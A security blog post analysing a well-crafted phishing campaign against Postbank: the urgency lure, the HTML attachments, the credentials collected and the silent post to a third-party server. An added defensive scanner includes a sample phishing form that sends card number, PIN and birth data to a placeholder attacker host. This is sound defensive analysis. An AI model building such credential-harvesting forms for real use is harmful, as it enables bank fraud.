Extremely complex phishing attack against German Postbank

I don’t write very often about phishing attempts which aren’t international, but this phishing attack against the German Postbank is extremely special and it deserves a thorough analysis.

I received the phishing email below on one of my private email addresses and it was blocked by the spam filter of the provider. This usually means that the email was sent in very large quantities or that it was so badly constructed that it was easy to detect. But, in this case, simple is not how I would categorize this email.

The email pretends to come from the Data Synchronization Service of Postbank. I have no idea if something like this exists, but the stated purpose of the email is to update the PIN for telephone banking. As in all phishing emails, the fraudsters try to create a sense of urgency by setting a deadline after which the bank account is suspended: 7 days after receiving this email. The recipient of the email must click on the link or open the attachment.

And this is where the problems with this email begin. The fraudsters expected email clients to display a single attachment, an HTML file called start.html. But they apparently didn’t notice that the recipient also sees a second attachment, status.html.

This is what status.html displays:

And this is what start.html displays:

As can be easily seen, the intended order is start.html first and then status.html. The first one asks for customer details such as: name, card number, phone PIN, birth date, birth town. With this information anyone can call Postbank and pretend to be the person who submitted the data.

Once authenticated, it is probably possible to perform financial transactions with the accounts registered for the user.

If it is possible to transfer money with only this information, then this is a major problem for Postbank.

Why? A main principle of IT security is broken: Authentication must always be different from Authorization. The data above only authenticate the user; they should not authorize him to perform financial transactions. Authorization must be done in a second step, via SMS (mTAN) or at least a classical TAN. Postbank already cancelled the concept of the TAN last year – they allow only mTAN and other authorization methods.

After the user clicks on the button to submit the data, the following things happen:

1. The information is sent to a 3rd-party server owned by a Russian citizen (registered in May 2012)

2. The status.html page is shown

3. The browser is redirected to the standard Postbank page.

Very clever, indeed.

Basically, the only link which doesn’t belong to Postbank is the one to which the data is submitted.

I am not able to see any syntactic errors, meaning that the pages were copied from the Postbank website.


Conclusion

We see here a phishing attack which is extremely well produced.

A usual phishing attack follows this pattern:

1. phishing email with link to the fake website

2. fake website where the information is collected

Most of the time the quality of both the email and the website is very poor.


This phishing attack involves many more steps:

1. Phishing email with a link to an internal document

This makes it harder for standard spam filters to detect the fake URL

2. An internal document (the attached HTML file) which contains the form that collects the information

3. All collected information is silently submitted to a 3rd-party website

4. Another local page (status.html) is displayed after submitting the information

5. The user is redirected to the original website of the brand being attacked.

The quality of both the email and the website (web pages, in this case) is perfect; they were probably copied from the original.
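As an added example (not code from the original post or from Avira), here is a defender-side check for the pattern described in steps 2 and 3 above and in the earlier observation that the only non-Postbank link is the one receiving the submitted data: it parses an HTML attachment and flags every form that collects credential-like fields while posting to a host outside the brand’s domain. The brand host list, the field keywords and the constructed sample attachment with its placeholder collector domain are all assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the only hosts a genuine Postbank form may post to.
BRAND_HOSTS = {"postbank.de", "www.postbank.de"}
# Assumption: substrings that mark a field as credential-like (German and English).
SENSITIVE_FIELDS = {"pin", "card", "kartennummer", "geburtsdatum"}


class FormScanner(HTMLParser):
    """Collect every <form> action together with the names of its <input> fields."""

    def __init__(self):
        super().__init__()
        self.forms = []          # list of (action, [input names])
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = (a.get("action") or "", [])
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current[1].append((a.get("name") or "").lower())

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def scan_attachment(html: str) -> list:
    """Return one finding per form that collects sensitive fields and posts off-brand.

    A relative or empty action in an attached file resolves to the local file,
    never to the brand, so it is treated as off-brand as well.
    """
    scanner = FormScanner()
    scanner.feed(html)
    findings = []
    for action, names in scanner.forms:
        host = urlparse(action).hostname or ""
        sensitive = sorted({n for n in names if any(k in n for k in SENSITIVE_FIELDS)})
        if host not in BRAND_HOSTS and sensitive:
            findings.append({"action_host": host, "fields": sensitive})
    return findings


# Constructed sample mimicking the start.html described in the post (placeholder domain).
SAMPLE_START_HTML = """<html><body>
<form method="post" action="http://collector.attacker.invalid/submit.php">
  <input name="Name"><input name="Kartennummer"><input name="TelefonPIN">
  <input name="Geburtsdatum"><input name="Geburtsort"><input type="submit" value="Weiter">
</form></body></html>"""
```

Run it over every HTML attachment at the mail gateway; a hit on an attachment that also references the brand’s own site elsewhere is exactly the signature of this campaign.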


All users of Internet Security and Avira for Exchange are protected against this attack: all these emails are marked as HIGH level spam.

The phishing attack has also been submitted to the Security Department of Postbank.


Sorin Mustaca

Data Security Expert